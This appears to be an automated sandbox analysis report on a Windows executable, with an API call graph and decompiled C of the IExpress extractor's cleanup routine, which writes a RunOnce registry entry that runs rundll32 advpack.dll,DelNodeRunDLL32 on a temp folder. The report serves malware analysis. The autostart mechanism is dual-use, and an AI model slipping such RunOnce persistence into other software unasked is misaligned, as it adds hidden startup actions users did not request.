API calls 2919->2926 2924 eb44b9 20 API calls 2920->2924 2922 eb1df8 LocalAlloc 2921->2922 2923 eb1d81 CompareStringA 2921->2923 2922->2920 2925 eb1e0b GetFileAttributesA 2922->2925 2923->2922 2930 eb1d9b 2923->2930 2944 eb1cc2 2924->2944 2938 eb1e1d 2925->2938 2945 eb1e45 2925->2945 2927 eb1c31 2926->2927 2929 eb1c50 LocalAlloc 2927->2929 2933 eb1a84 2 API calls 2927->2933 2928 eb1e89 2932 eb6ce0 4 API calls 2928->2932 2929->2920 2931 eb1c67 GetPrivateProfileIntA GetPrivateProfileStringA 2929->2931 2930->2930 2934 eb1dbe LocalAlloc 2930->2934 2940 eb1cf8 2931->2940 2931->2944 2937 eb1ea1 2932->2937 2933->2929 2934->2920 2939 eb1de1 2934->2939 2937->2663 2938->2945 2941 eb171e _vsnprintf 2939->2941 2942 eb1d09 GetShortPathNameA 2940->2942 2943 eb1d23 2940->2943 2941->2944 2942->2943 2946 eb171e _vsnprintf 2943->2946 2944->2928 3017 eb2aac 2945->3017 2946->2944 2953 eb209a 2947->2953 2956 eb2256 2947->2956 2948 eb6ce0 4 API calls 2950 eb2263 2948->2950 2949 eb171e _vsnprintf 2951 eb20af RegQueryValueExA 2949->2951 2950->2663 2952 eb20dc 2951->2952 2951->2953 2954 eb20fb GetSystemDirectoryA 2952->2954 2955 eb20e4 RegCloseKey 2952->2955 2953->2949 2953->2952 2957 eb658a CharPrevA 2954->2957 2955->2956 2956->2948 2958 eb211b LoadLibraryA 2957->2958 2959 eb2179 GetModuleFileNameA 2958->2959 2960 eb212e GetProcAddress FreeLibrary 2958->2960 2962 eb21de RegCloseKey 2959->2962 2965 eb2177 2959->2965 2960->2959 2961 eb214e GetSystemDirectoryA 2960->2961 2963 eb2165 2961->2963 2961->2965 2962->2956 2964 eb658a CharPrevA 2963->2964 2964->2965 2965->2965 2966 eb21b7 LocalAlloc 2965->2966 2967 eb21cd 2966->2967 2968 eb21ec 2966->2968 2969 eb44b9 20 API calls 2967->2969 2970 eb171e _vsnprintf 2968->2970 2969->2962 2971 eb2218 RegSetValueExA RegCloseKey LocalFree 2970->2971 2971->2956 2974 eb4106 2973->2974 2975 eb4016 CreateProcessA 2973->2975 2978 eb6ce0 4 API calls 2974->2978 2976 eb4041 WaitForSingleObject GetExitCodeProcess 2975->2976 2977 eb40c4 2975->2977 2980 eb4070 2976->2980 2979 eb6285 GetLastError 2977->2979 2981 eb4117 2978->2981 2983 eb40c9 GetLastError FormatMessageA 2979->2983 3044 eb411b 2980->3044 2981->2663 2985 eb44b9 20 API calls 2983->2985 2984 eb4096 CloseHandle CloseHandle 2984->2974 2986 eb40ba 2984->2986 2985->2974 2986->2974 2988 eb64c2 2987->2988 2989 eb658a CharPrevA 2988->2989 2990 eb64d8 GetFileAttributesA 2989->2990 2991 eb64ea 2990->2991 2992 eb6501 LoadLibraryA 2990->2992 2991->2992 2993 eb64ee LoadLibraryExA 2991->2993 2994 eb6508 2992->2994 2993->2994 2995 eb6ce0 4 API calls 2994->2995 2996 eb6513 2995->2996 2996->2695 2998 eb2289 RegOpenKeyExA 2997->2998 2999 eb2381 2997->2999 2998->2999 3001 eb22b1 RegQueryValueExA 2998->3001 3000 eb6ce0 4 API calls 2999->3000 3002 eb238c 3000->3002 3003 eb22e6 memset GetSystemDirectoryA 3001->3003 3004 eb2374 RegCloseKey 3001->3004 3002->2674 3005 eb230f 3003->3005 3006 eb2321 3003->3006 3004->2999 3007 eb658a CharPrevA 3005->3007 3008 eb171e _vsnprintf 3006->3008 3007->3006 3009 eb233f RegSetValueExA 3008->3009 3009->3004 3012 eb1a9a 3011->3012 3014 eb1aba 3012->3014 3016 eb1aaf 3012->3016 3030 eb667f 3012->3030 3014->2910 3015 eb667f 2 API calls 3015->3016 3016->3014 3016->3015 3018 eb2be6 3017->3018 3019 eb2ad4 GetModuleFileNameA 3017->3019 3020 eb6ce0 4 API calls 3018->3020 3029 eb2b02 3019->3029 3021 eb2bf5 3020->3021 3021->2928 3022 eb2af1 IsDBCSLeadByte 3022->3029 3023 eb2bca CharNextA 3026 eb2bd3 CharNextA 3023->3026 3024 eb2b11 CharNextA CharUpperA 3025 eb2b8d CharUpperA 3024->3025 3024->3029 3025->3029 3026->3029 3028 eb2b43 CharPrevA 3028->3029 3029->3018 3029->3022 3029->3023 3029->3024 3029->3026 3029->3028 3035 eb65e8 3029->3035 3031 eb6689 3030->3031 3032 eb66a5 3031->3032 3033 eb6648 IsDBCSLeadByte 3031->3033 3034 eb6697 CharNextA 3031->3034 3032->3012 3033->3031 3034->3031 3036 eb65f4 3035->3036 3036->3036 3037 eb65fb CharPrevA 3036->3037 3038 eb6611 CharPrevA 3037->3038 3039 eb660b 3038->3039 3040 eb661e 3038->3040 3039->3038 3039->3040 3041 eb663d 3040->3041 3042 eb6627 CharPrevA 3040->3042 3043 eb6634 CharNextA 3040->3043 3041->3029 3042->3041 3042->3043 3043->3041 3045 eb4132 3044->3045 3047 eb412a 3044->3047 3048 eb1ea7 3045->3048 3047->2984 3049 eb1eba 3048->3049 3050 eb1ed3 3048->3050 3051 eb256d 15 API calls 3049->3051 3050->3047 3051->3050 3053 eb1ff0 RegOpenKeyExA 3052->3053 3054 eb2026 3052->3054 3053->3054 3055 eb200f RegDeleteValueA RegCloseKey 3053->3055 3054->2315 3055->3054 3056 eb4ca0 GlobalAlloc 3123 eb19e0 3124 eb1a03 3123->3124 3125 eb1a24 GetDesktopWindow 3123->3125 3127 eb1a20 3124->3127 3128 eb1a16 EndDialog 3124->3128 3132 eb43d0 6 API calls 3125->3132 3130 eb6ce0 4 API calls 3127->3130 3128->3127 3131 eb1a7e 3130->3131 3134 eb4463 SetWindowPos 3132->3134 3135 eb6ce0 4 API calls 3134->3135 3136 eb1a33 LoadStringA SetDlgItemTextA MessageBeep 3135->3136 3136->3127 3137 eb6a20 __getmainargs 3138 eb6ef0 3139 eb6f2d 3138->3139 3141 eb6f02 3138->3141 3140 eb6f27 ?terminate@ 3140->3139 3141->3139 3141->3140 3142 eb34f0 3143 eb3504 3142->3143 3144 eb35b8 3142->3144 3143->3144 3145 eb351b 3143->3145 3146 eb35be GetDesktopWindow 3143->3146 3147 eb3526 3144->3147 3148 eb3671 EndDialog 3144->3148 3150 eb354f 3145->3150 3151 eb351f 3145->3151 3149 eb43d0 11 API calls 3146->3149 3148->3147 3152 eb35d6 3149->3152 3150->3147 3154 eb3559 ResetEvent 3150->3154 3151->3147 3153 eb352d TerminateThread EndDialog 3151->3153 3155 eb361d SetWindowTextA CreateThread 3152->3155 3156 eb35e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3152->3156 3153->3147 3157 eb44b9 20 API calls 3154->3157 3155->3147 3158 eb3646 3155->3158 3156->3155 3159 eb3581 3157->3159 3160 eb44b9 20 API calls 3158->3160 3161 eb359b SetEvent 3159->3161 3162 eb358a SetEvent 3159->3162 3160->3144 3163 eb3680 4 API calls 3161->3163 3162->3147 3163->3144 3164 eb69b0 3165 eb69b5 3164->3165 3173 eb6fbe GetModuleHandleW 3165->3173 3167 eb69c1 __set_app_type __p__fmode __p__commode 3168 eb69f9 3167->3168 3169 eb6a0e 3168->3169 3170 eb6a02 __setusermatherr 3168->3170 3175 eb71ef _controlfp 3169->3175 3170->3169 3172 eb6a13 3174 eb6fcf 3173->3174 3174->3167 3175->3172 3176 eb7270 _except_handler4_common 3177 eb7176 3178 eb717a 3177->3178 3179 eb717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 3177->3179 3178->3179 3180 eb71cd 3178->3180 3179->3180 3181 eb6c03 3182 eb6c1e 3181->3182 3183 eb6c17 _exit 3181->3183 3184 eb6c27 _cexit 3182->3184 3185 eb6c32 3182->3185 3183->3182 3184->3185 3057 eb4cc0 GlobalFree 3058 eb6f40 SetUnhandledExceptionFilter 3186 eb4bc0 3187 eb4c05 3186->3187 3189 eb4bd7 3186->3189 3188 eb4c1b SetFilePointer 3187->3188 3187->3189 3188->3189 3190 eb30c0 3191 eb30de CallWindowProcA 3190->3191 3192 eb30ce 3190->3192 3193 eb30da 3191->3193 3192->3191 3192->3193 3194 eb63c0 3195 eb6407 3194->3195 3196 eb658a CharPrevA 3195->3196 3197 eb6415 CreateFileA 3196->3197 3198 eb643a 3197->3198 3199 eb6448 WriteFile 3197->3199 3202 eb6ce0 4 API calls 3198->3202 3200 eb6465 CloseHandle 3199->3200 3200->3198 3203 eb648f 3202->3203 3204 eb3100 3205 eb3111 3204->3205 3206 eb31b0 3204->3206 3209 eb3149 GetDesktopWindow 3205->3209 3213 eb311d 3205->3213 3207 eb3141 3206->3207 3208 eb31b9 SendDlgItemMessageA 3206->3208 3208->3207 3211 eb43d0 11 API calls 3209->3211 3210 eb3138 EndDialog 3210->3207 3212 eb315d 6 API calls 3211->3212 3212->3207 3213->3207 3213->3210 3214 eb4200 3215 eb420b SendMessageA 3214->3215 3216 eb421e 3214->3216 3215->3216 3059 eb4cd0 3060 eb4d0b 3059->3060 3061 eb4cf4 3059->3061 3062 eb4d02 3060->3062 3065 eb4dcb 3060->3065 3068 eb4d25 3060->3068 3061->3062 3063 eb4b60 FindCloseChangeNotification 3061->3063 3064 eb6ce0 4 API calls 3062->3064 3063->3062 3067 eb4e95 3064->3067 3066 eb4dd4 SetDlgItemTextA 3065->3066 3069 eb4de3 3065->3069 3066->3069 3068->3062 3082 eb4c37 3068->3082 3069->3062 3087 eb476d 3069->3087 3073 eb4e38 3073->3062 3075 eb4980 25 API calls 3073->3075 3074 eb4b60 FindCloseChangeNotification 3076 eb4d99 SetFileAttributesA 3074->3076 3077 eb4e56 3075->3077 3076->3062 3077->3062 3078 eb4e64 3077->3078 3096 eb47e0 LocalAlloc 3078->3096 3081 eb4e6f 3081->3062 3083 eb4c4c DosDateTimeToFileTime 3082->3083 3085 eb4c88 3082->3085 3084 eb4c5e LocalFileTimeToFileTime 3083->3084 3083->3085 3084->3085 3086 eb4c70 SetFileTime 3084->3086 3085->3062 3085->3074 3086->3085 3105 eb66ae GetFileAttributesA 3087->3105 3089 eb477b 3089->3073 3090 eb47cc SetFileAttributesA 3091 eb47db 3090->3091 3091->3073 3093 eb6517 24 API calls 3094 eb47b1 3093->3094 3094->3090 3094->3091 3095 eb47c2 3094->3095 3095->3090 3097 eb480f LocalAlloc 3096->3097 3098 eb47f6 3096->3098 3101 eb4831 3097->3101 3104 eb480b 3097->3104 3099 eb44b9 20 API calls 3098->3099 3099->3104 3102 eb44b9 20 API calls 3101->3102 3103 eb4846 LocalFree 3102->3103 3103->3104 3104->3081 3106 eb4777 3105->3106 3106->3089 3106->3090 3106->3093 3107 eb4ad0 3115 eb3680 3107->3115 3110 eb4ae9 3111 eb4aee WriteFile 3112 eb4b0f 3111->3112 3113 eb4b14 3111->3113 3113->3112 3114 eb4b3b SendDlgItemMessageA 3113->3114 3114->3112 3116 eb3691 MsgWaitForMultipleObjects 3115->3116 3117 eb36a9 PeekMessageA 3116->3117 3118 eb36e8 3116->3118 3117->3116 3119 eb36bc 3117->3119 3118->3110 3118->3111 3119->3116 3119->3118 3120 eb36c7 DispatchMessageA 3119->3120 3121 eb36d1 PeekMessageA 3119->3121 3120->3121 3121->3119 3217 eb4a50 3218 eb4a9f ReadFile 3217->3218 3219 eb4a66 3217->3219 3220 eb4abb 3218->3220 3219->3220 3221 eb4a82 memcpy 3219->3221 3221->3220 3222 eb3450 3223 eb345e 3222->3223 3224 eb34d3 EndDialog 3222->3224 3225 eb349a GetDesktopWindow 3223->3225 3229 eb3465 3223->3229 3226 eb346a 3224->3226 3227 eb43d0 11 API calls 3225->3227 3228 eb34ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3227->3228 3228->3226 3229->3226 3230 eb348c EndDialog 3229->3230 3230->3226 3231 eb3210 3232 eb3227 3231->3232 3256 eb328e EndDialog 3231->3256 3233 eb33e2 GetDesktopWindow 3232->3233 3236 eb3235 3232->3236 3235 eb43d0 11 API calls 3233->3235 3237 eb33f1 SetWindowTextA SendDlgItemMessageA 3235->3237 3238 eb32dd GetDlgItemTextA 3236->3238 3239 eb324c 3236->3239 3248 eb3239 3236->3248 3240 eb341f GetDlgItem EnableWindow 3237->3240 3237->3248 3241 eb3366 3238->3241 3249 eb32fc 3238->3249 3242 eb3251 3239->3242 3243 eb32c5 EndDialog 3239->3243 3240->3248 3245 eb44b9 20 API calls 3241->3245 3244 eb325c LoadStringA 3242->3244 3242->3248 3243->3248 3246 eb327b 3244->3246 3247 eb3294 3244->3247 3245->3248 3252 eb44b9 20 API calls 3246->3252 3269 eb4224 LoadLibraryA 3247->3269 3249->3241 3251 eb3331 GetFileAttributesA 3249->3251 3254 eb333f 3251->3254 3255 eb337c 3251->3255 3252->3256 3259 eb44b9 20 API calls 3254->3259 3258 eb658a CharPrevA 3255->3258 3256->3248 3257 eb32a5 SetDlgItemTextA 3257->3246 3257->3248 3260 eb338d 3258->3260 3261 eb3351 3259->3261 3262 eb58c8 27 API calls 3260->3262 3261->3248 3263 eb335a CreateDirectoryA 3261->3263 3264 eb3394 3262->3264 3263->3241 3263->3255 3264->3241 3265 eb33a4 3264->3265 3266 eb33c7 EndDialog 3265->3266 3267 eb597d 34 API calls 3265->3267 3266->3248 3268 eb33c3 3267->3268 3268->3248 3268->3266 3270 eb43b2 3269->3270 3271 eb4246 GetProcAddress 3269->3271 3275 eb44b9 20 API calls 3270->3275 3272 eb425d GetProcAddress 3271->3272 3273 eb43a4 FreeLibrary 3271->3273 3272->3273 3274 eb4274 GetProcAddress 3272->3274 3273->3270 3274->3273 3276 eb428b 3274->3276 3277 eb329d 3275->3277 3278 eb4295 GetTempPathA 3276->3278 3283 eb42e1 3276->3283 3277->3248 3277->3257 3279 eb42ad 3278->3279 3279->3279 3280 eb42b4 CharPrevA 3279->3280 3281 eb42d0 CharPrevA 3280->3281 3280->3283 3281->3283 3282 eb4390 FreeLibrary 3282->3277 3283->3282

                            Callgraph

                            • Executed
                            • Not Executed
                            • Opacity -> Relevance
                            • Disassembly available
                            callgraph 0 Function_00EB70EB 1 Function_00EB1AE8 13 Function_00EB6CE0 1->13 26 Function_00EB66C8 1->26 37 Function_00EB2AAC 1->37 47 Function_00EB44B9 1->47 49 Function_00EB16B3 1->49 53 Function_00EB658A 1->53 56 Function_00EB1781 1->56 57 Function_00EB1680 1->57 62 Function_00EB1A84 1->62 114 Function_00EB171E 1->114 2 Function_00EB28E8 54 Function_00EB2A89 2->54 83 Function_00EB2773 2->83 3 Function_00EB65E8 4 Function_00EB3FEF 4->13 4->47 61 Function_00EB6285 4->61 111 Function_00EB411B 4->111 5 Function_00EB71EF 6 Function_00EB6BEF 7 Function_00EB36EE 7->2 7->13 24 Function_00EB67C9 7->24 7->47 7->54 112 Function_00EB681F 7->112 8 Function_00EB17EE 8->13 9 Function_00EB1FE1 10 Function_00EB47E0 10->47 10->57 11 Function_00EB4FE0 20 Function_00EB4EFD 11->20 11->47 55 Function_00EB468F 11->55 12 Function_00EB31E0 23 Function_00EB6CF0 13->23 14 Function_00EB24E0 14->13 14->53 15 Function_00EB19E0 15->13 34 Function_00EB43D0 15->34 16 Function_00EB51E5 16->47 16->55 16->61 17 Function_00EB2BFB 35 Function_00EB2CAA 17->35 51 Function_00EB52B6 17->51 68 Function_00EB1F90 17->68 115 Function_00EB2F1D 17->115 18 Function_00EB66F9 19 Function_00EB70FE 20->13 58 Function_00EB4980 20->58 76 Function_00EB4B60 20->76 21 Function_00EB6EF0 22 Function_00EB34F0 22->34 22->47 59 Function_00EB3680 22->59 66 Function_00EB6793 24->66 25 Function_00EB17C8 87 Function_00EB6648 26->87 27 Function_00EB58C8 27->47 27->53 27->57 27->61 28 Function_00EB4CC0 29 Function_00EB4BC0 30 Function_00EB30C0 31 Function_00EB63C0 31->13 31->53 31->56 32 Function_00EB4CD0 32->10 32->13 32->58 63 Function_00EB4E99 32->63 72 Function_00EB476D 32->72 32->76 103 Function_00EB4C37 32->103 107 Function_00EB4702 32->107 33 Function_00EB4AD0 33->59 34->13 35->7 35->13 38 Function_00EB18A3 35->38 35->47 35->55 65 Function_00EB5C9E 35->65 67 Function_00EB2390 35->67 119 Function_00EB6517 35->119 36 Function_00EB66AE 37->3 37->13 37->25 37->57 38->8 38->13 39 Function_00EB3BA2 39->1 39->4 39->13 39->47 39->55 39->56 39->61 69 Function_00EB6495 39->69 78 Function_00EB2267 39->78 94 Function_00EB202A 39->94 40 Function_00EB72A2 41 Function_00EB53A1 41->13 41->53 41->57 41->114 42 Function_00EB6FA1 43 Function_00EB55A0 43->13 43->47 43->53 43->55 43->56 43->61 77 Function_00EB5467 43->77 82 Function_00EB597D 43->82 90 Function_00EB6952 43->90 102 Function_00EB2630 43->102 43->119 44 Function_00EB4CA0 45 Function_00EB1EA7 71 Function_00EB256D 45->71 46 Function_00EB6FA5 88 Function_00EB724D 46->88 47->13 47->24 47->57 47->112 47->114 48 Function_00EB6FBE 93 Function_00EB6F54 48->93 49->56 50 Function_00EB69B0 50->5 50->48 85 Function_00EB6C70 50->85 110 Function_00EB7000 50->110 51->3 51->9 51->13 51->56 51->67 52 Function_00EB268B 52->13 52->47 52->114 53->49 57->56 58->47 80 Function_00EB487A 58->80 60 Function_00EB6380 81 Function_00EB667F 62->81 63->57 64 Function_00EB6298 64->13 64->114 65->12 65->13 65->26 65->47 65->53 65->57 65->81 95 Function_00EB6E2A 65->95 118 Function_00EB5C17 65->118 67->13 67->49 67->53 67->57 67->67 68->13 68->45 68->47 69->13 69->53 69->56 70 Function_00EB4169 70->47 70->55 71->14 72->36 72->119 73 Function_00EB7060 96 Function_00EB7120 73->96 116 Function_00EB7010 73->116 74 Function_00EB6A60 74->17 74->73 74->88 101 Function_00EB6C3F 74->101 104 Function_00EB7208 74->104 75 Function_00EB6760 77->13 77->27 77->41 77->53 77->56 77->57 77->61 77->82 78->13 78->53 78->114 79 Function_00EB5164 79->47 79->55 79->64 105 Function_00EB490C 80->105 81->87 82->13 82->47 82->52 82->61 83->13 83->53 83->56 83->57 84 Function_00EB7270 86 Function_00EB7176 89 Function_00EB6F40 91 Function_00EB4A50 92 Function_00EB3450 92->34 93->88 93->104 94->13 94->47 94->53 94->114 95->23 97 Function_00EB6A20 98 Function_00EB3B26 98->11 98->64 98->119 99 Function_00EB4224 99->47 99->57 100 Function_00EB3A3F 100->47 100->55 100->61 100->119 102->13 102->47 106 Function_00EB6C03 106->88 107->49 107->57 108 Function_00EB3100 108->34 109 Function_00EB4200 111->45 112->13 112->18 113 Function_00EB621E 113->13 113->47 113->61 113->82 115->13 115->16 115->39 115->43 115->47 115->53 115->61 115->70 115->71 115->79 115->98 115->100 115->113 117 Function_00EB3210 117->27 117->34 117->47 117->53 117->82 117->99 119->47

                            Control-flow Graph

                            C-Code - Quality: 93%
                            			E00EB202A(struct HINSTANCE__* __edx) {
                            				signed int _v8;
                            				char _v268;
                            				char _v528;
                            				void* _v532;
                            				int _v536;
                            				int _v540;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t28;
                            				long _t36;
                            				long _t41;
                            				struct HINSTANCE__* _t46;
                            				intOrPtr _t49;
                            				intOrPtr _t50;
                            				CHAR* _t54;
                            				void _t56;
                            				signed int _t66;
                            				intOrPtr* _t72;
                            				void* _t73;
                            				void* _t75;
                            				void* _t80;
                            				intOrPtr* _t81;
                            				void* _t86;
                            				void* _t87;
                            				void* _t90;
                            				_Unknown_base(*)()* _t91;
                            				signed int _t93;
                            				void* _t94;
                            				void* _t95;
                            
                            				_t79 = __edx;
                            				_t28 =  *0xeb8004; // 0x92ae1240
                            				_v8 = _t28 ^ _t93;
                            				_t84 = 0x104;
                            				memset( &_v268, 0, 0x104);
                            				memset( &_v528, 0, 0x104);
                            				_t95 = _t94 + 0x18;
                            				_t66 = 0;
                            				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                            				if(_t36 != 0) {
                            					L24:
                            					return E00EB6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                            				}
                            				_push(_t86);
                            				_t87 = 0;
                            				while(1) {
                            					E00EB171E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
                            					_t95 = _t95 + 0x10;
                            					_t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
                            					if(_t41 != 0) {
                            						break;
                            					}
                            					_t87 = _t87 + 1;
                            					if(_t87 < 0xc8) {
                            						continue;
                            					}
                            					break;
                            				}
                            				if(_t87 != 0xc8) {
                            					GetSystemDirectoryA( &_v528, _t84);
                            					_t79 = _t84;
                            					E00EB658A( &_v528, _t84, "advpack.dll");
                            					_t46 = LoadLibraryA( &_v528); // executed
                            					_t84 = _t46;
                            					if(_t84 == 0) {
                            						L10:
                            						if(GetModuleFileNameA( *0xeb9a3c,  &_v268, 0x104) == 0) {
                            							L17:
                            							_t36 = RegCloseKey(_v532);
                            							L23:
                            							_pop(_t86);
                            							goto L24;
                            						}
                            						L11:
                            						_t72 =  &_v268;
                            						_t80 = _t72 + 1;
                            						do {
                            							_t49 =  *_t72;
                            							_t72 = _t72 + 1;
                            						} while (_t49 != 0);
                            						_t73 = _t72 - _t80;
                            						_t81 = 0xeb91e4;
                            						do {
                            							_t50 =  *_t81;
                            							_t81 = _t81 + 1;
                            						} while (_t50 != 0);
                            						_t84 = _t73 + 0x50 + _t81 - 0xeb91e5;
                            						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xeb91e5);
                            						if(_t90 != 0) {
                            							 *0xeb8580 = _t66 ^ 0x00000001;
                            							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                            							if(_t66 == 0) {
                            								_t54 = "%s /D:%s";
                            							}
                            							_push("C:\Users\engineer\AppData\Local\Temp\IXP000.TMP\");
                            							E00EB171E(_t90, _t84, _t54,  &_v268);
                            							_t75 = _t90;
                            							_t23 = _t75 + 1; // 0x1
                            							_t79 = _t23;
                            							do {
                            								_t56 =  *_t75;
                            								_t75 = _t75 + 1;
                            							} while (_t56 != 0);
                            							_t24 = _t75 - _t79 + 1; // 0x2
                            							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
                            							RegCloseKey(_v532); // executed
                            							_t36 = LocalFree(_t90);
                            							goto L23;
                            						}
                            						_t79 = 0x4b5;
                            						E00EB44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                            						goto L17;
                            					}
                            					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                            					_t66 = 0 | _t91 != 0x00000000;
                            					FreeLibrary(_t84); // executed
                            					if(_t91 == 0) {
                            						goto L10;
                            					}
                            					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                            						E00EB658A( &_v268, 0x104, 0xeb1140);
                            					}
                            					goto L11;
                            				}
                            				_t36 = RegCloseKey(_v532);
                            				 *0xeb8530 = _t66;
                            				goto L23;
                            			}

































                            0x00eb202a
                            0x00eb2035
                            0x00eb203c
                            0x00eb2041
                            0x00eb2050
                            0x00eb205f
                            0x00eb2064
                            0x00eb206f
                            0x00eb208c
                            0x00eb2094
                            0x00eb2257
                            0x00eb2266
                            0x00eb2266
                            0x00eb209a
                            0x00eb209b
                            0x00eb209d
                            0x00eb20aa
                            0x00eb20af
                            0x00eb20c9
                            0x00eb20d1
                            0x00000000
                            0x00000000
                            0x00eb20d3
                            0x00eb20da
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00eb20da
                            0x00eb20e2
                            0x00eb2103
                            0x00eb210e
                            0x00eb2116
                            0x00eb2122
                            0x00eb2128
                            0x00eb212c
                            0x00eb2179
                            0x00eb2194
                            0x00eb21de
                            0x00eb21e4
                            0x00eb2256
                            0x00eb2256
                            0x00000000
                            0x00eb2256
                            0x00eb2196
                            0x00eb2196
                            0x00eb219c
                            0x00eb219f
                            0x00eb219f
                            0x00eb21a1
                            0x00eb21a2
                            0x00eb21a6
                            0x00eb21a8
                            0x00eb21b0
                            0x00eb21b0
                            0x00eb21b2
                            0x00eb21b3
                            0x00eb21bc
                            0x00eb21c7
                            0x00eb21cb
                            0x00eb21f1
                            0x00eb21f6
                            0x00eb21fd
                            0x00eb21ff
                            0x00eb21ff
                            0x00eb2204
                            0x00eb2213
                            0x00eb2218
                            0x00eb221d
                            0x00eb221d
                            0x00eb2220
                            0x00eb2220
                            0x00eb2222
                            0x00eb2223
                            0x00eb2229
                            0x00eb223d
                            0x00eb2249
                            0x00eb2250
                            0x00000000
                            0x00eb2250
                            0x00eb21d2
                            0x00eb21d9
                            0x00000000
                            0x00eb21d9
                            0x00eb213a
                            0x00eb2141
                            0x00eb2144
                            0x00eb214c
                            0x00000000
                            0x00000000
                            0x00eb2163
                            0x00eb2172
                            0x00eb2172
                            0x00000000
                            0x00eb2163
                            0x00eb20ea
                            0x00eb20f0
                            0x00000000

                            APIs
                            • memset.MSVCRT ref: 00EB2050
                            • memset.MSVCRT ref: 00EB205F
                            • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00EB208C
                              • Part of subcall function 00EB171E: _vsnprintf.MSVCRT ref: 00EB1750
                            • RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00EB20C9
                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00EB20EA
                            • GetSystemDirectoryA.KERNEL32 ref: 00EB2103
                            • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00EB2122
                            • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00EB2134
                            • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00EB2144
                            • GetSystemDirectoryA.KERNEL32 ref: 00EB215B
                            • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00EB218C
                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00EB21C1
                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00EB21E4
                            • RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00EB223D
                            • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00EB2249
                            • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00EB2250
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                            • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                            • API String ID: 178549006-607953301
                            • Opcode ID: 91733d59ac8972bbb951e01a03a12cb711a2aae8e24bc13444154e654961bc05
                            • Instruction ID: 47f1fe1ac97e284183fec4196815644a3df1c81c448f7bdeb739d7fe41b8df02
                            • Opcode Fuzzy Hash: 91733d59ac8972bbb951e01a03a12cb711a2aae8e24bc13444154e654961bc05
                            • Instruction Fuzzy Hash: D751D371A01214AFDB20AF65DC49FFB776CEF54700F0412A8FA45F7151EA719D49CA60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
